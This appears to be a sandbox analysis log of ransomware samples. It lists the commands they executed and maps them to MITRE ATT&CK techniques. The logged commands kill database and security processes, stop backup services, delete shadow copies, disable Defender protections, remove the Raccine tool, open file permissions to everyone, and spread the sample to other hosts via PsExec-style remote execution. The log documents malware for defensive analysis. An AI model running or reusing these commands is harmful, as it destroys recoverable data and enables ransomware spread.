    "arp" -a
    3⤵
    PID:4968
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:4040
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4292
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5516
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Users
    3⤵
    PID:5232
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\A$
    3⤵
    PID:3308
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:6972
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\B$
    3⤵
    PID:4280
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:2012
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\C$
    3⤵
    PID:5908
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:4328
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\D$
    3⤵
    PID:5768
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:6932
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:5944
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\E$
    3⤵
    PID:576
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6188
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\F$
    3⤵
    PID:4888
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\G$
    3⤵
    PID:5060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:748
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\H$
    3⤵
    PID:5540
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:1416
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\I$
    3⤵
    PID:5576
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4300
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:7152
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\J$
    3⤵
    PID:5720
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\K$
    3⤵
    PID:6680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:7056
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\L$
    3⤵
    PID:6576
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:4624
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\M$
    3⤵
    PID:5712
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:4160
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\N$
    3⤵
    PID:4144
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\O$
    3⤵
    PID:1628
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:5924
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\P$
    3⤵
    PID:6396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4580
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.130\Q$
    3⤵
    PID:5988
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:3404
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.131\R$
    3⤵
    PID:5532
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:6176
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.131\S$
    3⤵
    PID:6644
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:1256
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.131\T$
    3⤵
    PID:7156
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:4492
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.131\U$
    3⤵
    PID:4852
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:6208
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.131\V$
    3⤵
    PID:4664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:5136
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:6856
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.131\W$
    3⤵
    PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.132\X$
    3⤵
    PID:4928
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:6780
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.132\Y$
    3⤵
    PID:5288
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Users
    3⤵
    PID:5644
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6160
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.132\Z$
    3⤵
    PID:4684
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:6008
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4648
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:6484
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:6464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:4964
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:5216
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:5220
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:2492
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5828
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:6904
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:6804
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:3940
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:6116
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:5508
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.18 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:3960
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1724
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    PID:2108
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:5004
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:4208
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:5476
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:4968
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5580
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:4512
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4764
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.39 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4376
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:6852
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\10.10.0.33 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5360
- - C:\Windows\TEMP\5zzduado.exe
    "C:\Windows\TEMP\5zzduado.exe" \\127.0.0.1 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5692
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5876
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6600
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.15\Users
    3⤵
    PID:404
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.18\Users
    3⤵
    PID:5304
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.21\Users
    3⤵
    PID:6480
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.24\Users
    3⤵
    PID:1532
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.39\Users
    3⤵
    PID:5036

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:3956

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:2180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:6844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:4400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:1408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:5680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:4676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:4244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:5024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:4204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:2368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:5400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:2352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:4516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:5036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:5712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:5308

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:6956

C:\Windows\PAExec-4232-RJMQBVDN.exe
C:\Windows\PAExec-4232-RJMQBVDN.exe -service
1⤵
PID:7016
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:5324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:6444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:6000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:5676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:1916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:5808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:6176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:6320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:2256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:6076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:1408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5908
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:1520
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:6620
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:1008
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:1476
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6916
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4632
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6852
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4308
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:6600
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:6060
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:6196
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:6172
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5588
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:6280
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:1540
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:6388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1652
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4696
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4928
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:6056
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5444
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:2616
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:5668
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4848
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:5104
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:4948
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:6560
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:5176
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:5992
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:2368
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:5852
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1444
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:5316
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:2252
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:6888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:3768
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4168
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4400
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:4292
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:6976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:5996
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:5992
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:4888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4272

C:\Windows\PAExec-1116-RJMQBVDN.exe
C:\Windows\PAExec-1116-RJMQBVDN.exe -service
1⤵
PID:5740
- C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:5204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:6016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:5152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:5848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:5460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:5576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:6504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:6972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5568
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:4284
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:3724
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:6088
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5468
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4280
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6240
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4948
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:6188
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:7036
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:2388
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:6528
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6848
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:6104
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:4880
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:4664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6420
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490
